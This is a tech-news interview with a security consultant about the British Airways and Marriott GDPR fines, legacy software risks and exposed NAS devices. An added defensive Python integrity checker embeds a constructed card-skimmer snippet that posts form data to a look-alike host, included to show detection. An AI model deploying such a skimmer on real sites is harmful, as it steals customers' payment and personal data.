Interviews

Simon Whittaker: Security in legacy systems and how to avoid huge GDPR fines

  • It's been a busy month in the cyber-security and infosec fields, with several major fines being issued against UK companies suffering data breaches as a result of poor security. British Airways was hit with a record fine of £183m for a breach in which customer data (including credit card details) was stolen by attackers, and then Marriott was fined £99m for a similar data breach.

    Both of these fines come under the EU General Data Protection Regulation (GDPR), which makes a company liable for fines of up to 4% of its annual global turnover for data breaches involving customers' personal information if it can be shown that the company failed in some capacity to secure the data. This has turned the tech landscape into a minefield for firms running old legacy software or hardware with dubious security.

    Sync NI caught up with Vertical Structure's Simon Whittaker to get his thoughts on how security concerns could have been addressed in these recent cases, how companies should handle security with legacy systems, and what can be done to avoid those monumental GDPR fines if the worst happens.


    Sync NI: You’ve been following the BA and Marriott cases with keen interest from a cyber-security angle. What do you think went wrong in these cases?

    Simon Whittaker: As is the case in the majority of breaches, this appears to be a chain of events leading from one small issue, which has resulted in a massive compromise. In BA's case, it appears that a single file was compromised with approximately 20 lines of code which captured mouse events and pushed form data (credit card and personal data) to a different site with a similar-looking domain name. In this case the attackers were very thorough; their use of a plausible domain name (baways.com) and a valid secure certificate on that domain proves this.

    The British Airways breach turned out to be due to a piece of JavaScript the firm hadn’t updated since 2012. Could other major firms have time bombs like this lurking in their systems?

    Absolutely. Keeping packages updated is really hard; in many cases even knowing what packages are in use can be tough. It is a known issue with the majority of firms that we work with. The important thing is to try and understand the potential threats and to mitigate them to the best of your ability.

    It is also important to be aware that the issue here was that the attackers had write access to code and were able to have it deployed. They could just as easily have defaced the web site and apps with political messages, but instead went for the money.
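    The attack described above (a known script with a few lines appended that push form data to a look-alike host) is exactly what a build-time integrity manifest catches. The following is an added example, not code from the interview or from Vertical Structure: it records the SHA-384 digest of every script at build time, in the same `sha384-<base64>` form a Subresource Integrity attribute uses, then compares what is actually served against that manifest and names any hostnames a changed file refers to outside the site's own origins. The file contents, paths, and the `example.com` / `examp1e-payments.com` hostnames are all constructed for the example.

```python
"""Deployment integrity check against a build-time manifest (added example).

Assumptions (not from the interview): scripts are served from the hosts in
ALLOWED_HOSTS, and the build pipeline can record a manifest of digests that
the deployment is later verified against.
"""
import base64
import hashlib
import re

# Assumption: the site's own origins; anything else in a script is suspicious.
ALLOWED_HOSTS = {"example.com", "static.example.com"}

# Matches the host part of any absolute http(s) URL literal in a script body.
URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sri_digest(body):
    """SRI-style integrity string ('sha384-' + base64 of the SHA-384 digest)."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


def build_manifest(files):
    """Map each script path to its expected digest; run this at build time."""
    return {path: sri_digest(body) for path, body in files.items()}


def foreign_hosts(body):
    """Hostnames referenced in a script body that are not in ALLOWED_HOSTS."""
    return {h.decode().lower() for h in URL_RE.findall(body)} - ALLOWED_HOSTS


def verify(manifest, served):
    """Compare served scripts with the manifest.

    Returns a list of (path, reason) findings; an empty list means every
    script in the manifest is present and byte-for-byte as built, and nothing
    extra is being served.
    """
    findings = []
    for path, expected in manifest.items():
        body = served.get(path)
        if body is None:
            findings.append((path, "missing from deployment"))
            continue
        if sri_digest(body) != expected:
            reason = "digest mismatch"
            extra = foreign_hosts(body)
            if extra:
                reason += ", references " + ", ".join(sorted(extra))
            findings.append((path, reason))
    for path in served.keys() - manifest.keys():
        findings.append((path, "not in build manifest"))
    return findings


# Constructed sample: a trimmed stand-in for an old feature-detection library
# as it was at build time ...
GOOD_JS = b"/* modernizr 2.6.2 */\nwindow.Modernizr=(function(){return {};})();\n"
# ... and the same file as served, with a constructed tail that posts the
# first form's fields to a look-alike host.  This is a placeholder for the
# kind of addition described in the interview, not a real skimmer.
TAMPERED_JS = GOOD_JS + (
    b"document.addEventListener('mouseup',function(){"
    b"fetch('https://examp1e-payments.com/api',{method:'POST',"
    b"body:JSON.stringify(Object.fromEntries(new FormData(document.forms[0])))});});\n"
)


def demo():
    """Verify a clean and a tampered deployment against the same manifest."""
    manifest = build_manifest({"/js/modernizr.js": GOOD_JS})
    clean = verify(manifest, {"/js/modernizr.js": GOOD_JS})
    tampered = verify(manifest, {"/js/modernizr.js": TAMPERED_JS})
    return clean, tampered


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean deployment:   ", clean)
    print("tampered deployment:", tampered)
```

    The manifest only helps if it is produced and stored somewhere the attacker cannot also rewrite (the build system or a signed artefact store, not the web root), and it does not cover scripts injected by changing the HTML itself; the same digest string in a `<script integrity="...">` attribute makes the browser enforce the check for scripts loaded from a CDN, and a Content-Security-Policy `connect-src` restricted to the site's own origins would have stopped the exfiltration even if the file had been changed.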

    What are the most common mistakes you see companies make with legacy software systems, and is there any general advice all companies can use to prevent this happening to them too?

    It is vital that companies recognise the threats which they are facing. The worst thing any company can do is to put their head in the sand and pretend everything will be fine.

    A major problem we see is that organisations put devices onto the internet with little to no protection. We demonstrated this recently when we identified and responsibly disclosed a flaw with some Lenovo NAS devices which allowed any anonymous user access to all files. If these devices are directly attached to the internet, that means *anyone* could access your most personal details.

    Another key point to take away is that you should be prepared for a breach and have plans in place to help deal with when it does happen. We have been helping some organisations with this response using tools like the free and brilliant Exercise in a Box service from the National Cyber Security Centre. This allows companies to role play incidents in a safe environment and understand the steps they would take.

    Many companies rely on third party software and stay on old versions for compatibility reasons or to prevent an automatic update breaking their system. Can companies design around this, or is it a case of continually re-evaluating third party software they use?

    It is vitally important to be aware of the software that you're using and help to understand the source of libraries in use. As previously stated though, keeping software updated is hard. In accordance with the CyberEssentials and NCSC guidance, we suggest that organisations have a patching policy and that this should extend to libraries and software. If the developer of the library says it's important for you to update then it's probably best to heed their advice.

    It is also possible to use tools to keep you up to date. GitHub offers some brilliant tools which scan your repositories regularly and tell you of issues, npm has a tool called retire, OWASP have a tool called OWASP Dependency Check, and there are other tools available as well. Great advice is available from OWASP as well.

    The size of the British Airways fine has revealed the scale of the financial damage that can be caused by not keeping systems updated. Do you think this makes the case for investing a much larger portion of tech budgets in re-engineering old systems?

    It is important to stress that this is the ICO's notice of intention to fine, not a fine immediately. It could be a while before we know the full extent of any fine, but these are really interesting first moves by the ICO. It is possible that these fine amounts could be cut or removed entirely during the process.

    It is also likely that we'll be hearing some news about the Ticketmaster breach from 2018 over the next weeks and months. As previously stated, the first step is to know what you're using and then to work hard to mitigate the risks which you locate. Evidence-based threat modelling is a brilliant tool to use for this.

    More recently Vertical Structure broke the story of the vulnerability in old Lenovo Iomega NAS devices. How would you suggest companies tackle the issue of legacy hardware?

    These are old devices and I'm not overly surprised that they are vulnerable. The thing that is most concerning here is that they are allowed onto the public internet with no basic protection in place: why are the files publicly facing? We worked with an ISO27001 auditor a few years ago who suggested publicly facing NAS devices as a replacement for cloud infrastructure. I disagreed then and I disagree now.

    As far as advice goes, I would suggest the following:

     - Set a baseline level of security and test to it, including thinking about what services are being exposed to the internet. In the UK we have the CyberEssentials scheme, which is designed to provide a basic level of security assurance and is supported by local cyber crime units and the National Cyber Security Centre.

     - Get a relationship with your local cyber law enforcement representatives. In Northern Ireland and the UK there are regional PROTECT teams; learn their names and keep in touch, they're lovely people.

     - It is also worthwhile testing your infrastructure to understand your exposure. You can do this for free, or obviously engage a cyber security organisation to provide expert guidance. Don't stick your head in the sand!

    Finally, plan towards the fact that a breach will happen. Again, the NCSC in the UK provides some incredible resources to help with your response. Test out how you would respond to issues with the NCSC Exercise in a Box; this is a free tool to help you respond to issues more effectively.

    Thanks for your time, Simon!

    About the author

    Brendan is a Sync NI writer with a special interest in the gaming sector, programming, emerging technology, and physics. To connect with Brendan, feel free to send him an email or follow him on Twitter.
